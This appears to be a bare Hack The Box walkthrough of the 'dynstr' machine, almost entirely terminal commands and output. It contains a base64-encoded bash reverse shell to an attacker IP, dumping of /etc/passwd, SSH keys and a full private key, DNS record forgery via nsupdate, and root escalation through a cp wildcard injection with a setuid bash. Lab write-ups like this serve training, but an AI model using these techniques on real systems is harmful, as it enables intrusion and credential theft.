dynstr

$ sudo nmap -p- -T4 -A 10.129.101.44
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 05:7c:5e:b1:83:f9:4f:ae:2f:08:e1:33:ff:f5:83:9e (RSA)
|   256 3f:73:b4:95:72:ca:5e:33:f6:8a:8f:46:cf:43:35:b9 (ECDSA)
|_  256 cc:0a:41:b7:a1:9a:43:da:1b:68:f5:2a:f8:2a:75:2c (ED25519)
53/tcp open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyna DNS
$ nikto -h http://10.129.101.44
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2a9d, size: 5bd688dfd7600, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 

dns@dyna.htb
no-ip.com; dnsalias.htb; dynamicdns.htb
Username: dynadns
Password: sndanyd
$ echo 10.129.101.44 dyna.htb no-ip.htb dnsalias.htb dynamicdns.htb | sudo tee -a /etc/hosts
$ dig version.bind CHAOS TXT @10.129.101.44
$ dig ANY @10.129.101.44 dyna.htb

generate RevShell via base64:
$ echo "bash -i &>/dev/tcp/10.10.14.67/4444 0>&1" | base64
YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE0LjY3LzQ0NDQgMD4mMQo=

kali@kali:~/0.htb/machines/dynstr$ python3 exploit.py YmFzaCAtaSAgJj4vZGV2L3RjcC8xMC4xMC4xNC4xNTQvNDQ0NCAwPiYxCg== 10.10.14.154
$ nc -lnvp 4444
kali@kali:~/0.htb/machines/dynstr$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.160.164] 52348
bash: cannot set terminal process group (795): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dynstr:/var/www/html/nic$ 
www-data@dynstr:/var/www/html/nic$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bindmgr:x:1001:1001::/home/bindmgr:/bin/bash
www-data@dynstr:/home/bindmgr/support-case-C62796521$ ls
ls
C62796521-debugging.script
C62796521-debugging.timing
command-output-C62796521.txt
strace-C62796521.txt
www-data@dynstr:/home/bindmgr/support-case-C62796521$ 
www-data@dynstr:/home/bindmgr/.ssh$ cat authorized_keys
cat authorized_keys
from="*.infra.dyna.htb" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDF4pkc7L5EaGz6CcwSCx1BqzuSUBvfseFUA0mBjsSh7BPCZIJyyXXjaS69SHEu6W2UxEKPWmdlj/WwmpPLA8ZqVHtVej7aXQPDHfPHuRAWI95AnCI4zy7+DyVXceMacK/MjhSiMAuMIfdg9W6+6EXTIg+8kN6yx2i38PZU8mpL5MP/g2iDKcV5SukhbkNI/4UvqheKX6w4znOJElCX+AoJZYO1QcdjBywmlei0fGvk+JtTwSBooPr+F5lewPcafVXKw1l2dQ4vONqlsN1EcpEkN+28ndlclgvm+26mhm7NNMPVWs4yeDXdDlP3SSd1ynKEJDnQhbhc1tcJSPEn7WOD bindmgr@nomen
www-data@dynstr:/home/bindmgr/.ssh$ cat known_hosts
cat known_hosts
|1|XxXpqZFfdEHi+D1J4xKhh5bFLhI=|3gs3peosk8KEB34F+4eGRDam2V4= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPF6wxJo3PKwDbrbot1+9sUfdkOvo5jD1iavL+LOJHKoCQn7EDqY4OeWREcPquOmK6np4QhvfsbzjOWXCsx4qEA=
|1|W3eIwD4XPbzxw43a9fbSrrXOJXI=|p3ZDmOSY7BcPoQFYs2tWZnDO4JQ= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPF6wxJo3PKwDbrbot1+9sUfdkOvo5jD1iavL+LOJHKoCQn7EDqY4OeWREcPquOmK6np4QhvfsbzjOWXCsx4qEA=
www-data@dynstr:/home/bindmgr/.ssh$ 
www-data@dynstr:/home/bindmgr$ nsupdate -k /etc/bind/infra.key
nsupdate -k /etc/bind/infra.key
update add test.infra.dyna.htb. 86400 A 10.10.14.154

update add 154.14.10.10.in-addr.arpa. 300 PTR test.infra.dyna.htb

send
kali@kali:~/0.htb/machines/dynstr$ echo "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAxeKZHOy+RGhs+gnMEgsdQas7klAb37HhVANJgY7EoewTwmSCcsl1\n42kuvUhxLultlMRCj1pnZY/1sJqTywPGalR7VXo+2l0Dwx3zx7kQFiPeQJwiOM8u/g8lV3\nHjGnCvzI4UojALjCH3YPVuvuhF0yIPvJDessdot/D2VPJqS+TD/4NogynFeUrpIW5DSP+F\nL6oXil+sOM5ziRJQl/gKCWWDtUHHYwcsJpXotHxr5PibU8EgaKD6/heZXsD3Gn1VysNZdn\nUOLzjapbDdRHKRJDftvJ3ZXJYL5vtupoZuzTTD1VrOMng13Q5T90kndcpyhCQ50IW4XNbX\nCUjxJ+1jgwAAA8g3MHb+NzB2/gAAAAdzc2gtcnNhAAABAQDF4pkc7L5EaGz6CcwSCx1Bqz\nuSUBvfseFUA0mBjsSh7BPCZIJyyXXjaS69SHEu6W2UxEKPWmdlj/WwmpPLA8ZqVHtVej7a\nXQPDHfPHuRAWI95AnCI4zy7+DyVXceMacK/MjhSiMAuMIfdg9W6+6EXTIg+8kN6yx2i38P\nZU8mpL5MP/g2iDKcV5SukhbkNI/4UvqheKX6w4znOJElCX+AoJZYO1QcdjBywmlei0fGvk\n+JtTwSBooPr+F5lewPcafVXKw1l2dQ4vONqlsN1EcpEkN+28ndlclgvm+26mhm7NNMPVWs\n4yeDXdDlP3SSd1ynKEJDnQhbhc1tcJSPEn7WODAAAAAwEAAQAAAQEAmg1KPaZgiUjybcVq\nxTE52YHAoqsSyBbm4Eye0OmgUp5C07cDhvEngZ7E8D6RPoAi+wm+93Ldw8dK8e2k2QtbUD\nPswCKnA8AdyaxruDRuPY422/2w9qD0aHzKCUV0E4VeltSVY54bn0BiIW1whda1ZSTDM31k\nobFz6J8CZidCcUmLuOmnNwZI4A0Va0g9kO54leWkhnbZGYshBhLx1LMixw5Oc3adx3Aj2l\nu291/oBdcnXeaqhiOo5sQ/4wM1h8NQliFRXraymkOV7qkNPPPMPknIAVMQ3KHCJBM0XqtS\nTbCX2irUtaW+Ca6ky54TIyaWNIwZNznoMeLpINn7nUXbgQAAAIB+QqeQO7A3KHtYtTtr6A\nTyk6sAVDCvrVoIhwdAHMXV6cB/Rxu7mPXs8mbCIyiLYveMD3KT7ccMVWnnzMmcpo2vceuE\nBNS+0zkLxL7+vWkdWp/A4EWQgI0gyVh5xWIS0ETBAhwz6RUW5cVkIq6huPqrLhSAkz+dMv\nC79o7j32R2KQAAAIEA8QK44BP50YoWVVmfjvDrdxIRqbnnSNFilg30KAd1iPSaEG/XQZyX\nWv//+lBBeJ9YHlHLczZgfxR6mp4us5BXBUo3Q7bv/djJhcsnWnQA9y9I3V9jyHniK4KvDt\nU96sHx5/UyZSKSPIZ8sjXtuPZUyppMJVynbN/qFWEDNAxholEAAACBANIxP6oCTAg2yYiZ\nb6Vity5Y2kSwcNgNV/E5bVE1i48E7vzYkW7iZ8/5Xm3xyykIQVkJMef6mveI972qx3z8m5\nrlfhko8zl6OtNtayoxUbQJvKKaTmLvfpho2PyE4E34BN+OBAIOvfRxnt2x2SjtW3ojCJoG\njGPLYph+aOFCJ3+TAAAADWJpbmRtZ3JAbm9tZW4BAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n" > bindmgr.key
kali@kali:~/0.htb/machines/dynstr$ chmod 600 bindmgr.key
kali@kali:~/0.htb/machines/dynstr$ sudo ssh -i openssh.key bindmgr@dyna.htb
Last login: Tue Jun  8 19:19:17 2021 from 6146f0a384024b2d9898129ccfee3408.infra.dyna.htb
bindmgr@dynstr:~$  
bindmgr@dynstr:~$ cat user.txt
607a890a9f54bb6d49ac074ce54f0d7f
bindmgr@dynstr:~$ 
bindmgr@dynstr:~$ sudo -l
sudo: unable to resolve host dynstr.dyna.htb: Name or service not known
Matching Defaults entries for bindmgr on dynstr:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bindmgr may run the following commands on dynstr:
    (ALL) NOPASSWD: /usr/local/bin/bindmgr.sh

bindmgr@dynstr:~$ cat /usr/local/bin/bindmgr.sh | grep cp
cp .version * /etc/bind/named.bindmgr/
bindmgr@dynstr:~$ echo 2 > .version
bindmgr@dynstr:~$ cp /bin/bash .
bindmgr@dynstr:~$ chmod +s bash
bindmgr@dynstr:~$ echo > --preserve=mode
bindmgr@dynstr:~$ sudo /usr/local/bin/bindmgr.sh 
sudo: unable to resolve host dynstr.dyna.htb: Name or service not known
[+] Running /usr/local/bin/bindmgr.sh to stage new configuration from /home/bindmgr.
[+] Creating /etc/bind/named.conf.bindmgr file.
[+] Staging files to /etc/bind/named.bindmgr.
cp: -r not specified; omitting directory 'support-case-C62796521'
[+] Checking staged configuration.
[-] ERROR: The generated configuration is not valid. Please fix following errors: 
    /etc/bind/named.bindmgr/bash:1: unknown option 'ELF...'
    /etc/bind/named.bindmgr/bash:14: unknown option 'h�ȀE�'
    /etc/bind/named.bindmgr/bash:40: unknown option '�YF'
    /etc/bind/named.bindmgr/bash:40: unexpected token near '}'
bindmgr@dynstr:~$ ls -la /etc/bind/named.bindmgr/
total 1172
drwxr-sr-x 2 root bind    4096 Jun 15 20:31 .
drwxr-sr-x 3 root bind    4096 Jun 15 20:31 ..
-rwsr-sr-x 1 root bind 1183448 Jun 15 20:31 bash
-r-------- 1 root bind      33 Jun 15 20:31 user.txt
-rw-rw-r-- 1 root bind       2 Jun 15 20:31 .version
bindmgr@dynstr:~$ /etc/bind/named.bindmgr/bash -p
bash-5.0# cat root.txt
ce80ae7b86997d587f24264bd0b931ad
bash-5.0# 

Navigation